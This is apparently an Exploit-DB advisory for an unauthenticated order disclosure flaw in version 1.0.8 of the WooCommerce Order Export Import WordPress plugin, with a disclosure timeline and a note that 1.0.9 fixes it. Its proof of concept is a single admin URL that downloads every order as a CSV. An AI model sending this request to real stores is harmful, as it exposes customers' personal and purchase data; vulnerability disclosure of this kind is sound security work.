WordPress Plugin Order Export Import for WooCommerce - Order Information Disclosure

EDB-ID:

40391

CVE:

N/A




Platform:

PHP

Date:

2016-09-19


# Exploit Title: WordPress Plugin Order Export Import for WooCommerce
# Link: https://wordpress.org/plugins/order-import-export-for-woocommerce/
# Version: 1.0.8
# Date: 19th 2016
# Exploit Author: contact ([a]) david-peltier ([d]) fr
# Vendor Homepage: xadapter.com
# Version: 1.0.8
# Timeline: Vuln found: 17-09-2016, reported to vendor: 18-09-2016, fix: 19-09-2016


### SUMMARY

WooCommerce Order Export Import Plugin helps you to easily export and import orders in your store.
This attacks allows an attacker to export all order without being authenticated

### POC

http://server/wp-admin/admin.php?page=wf_woocommerce_order_im_ex&action=export
A .CSV with all orders will be downloaded

### FIX

The vendor fix this issue in 1.0.9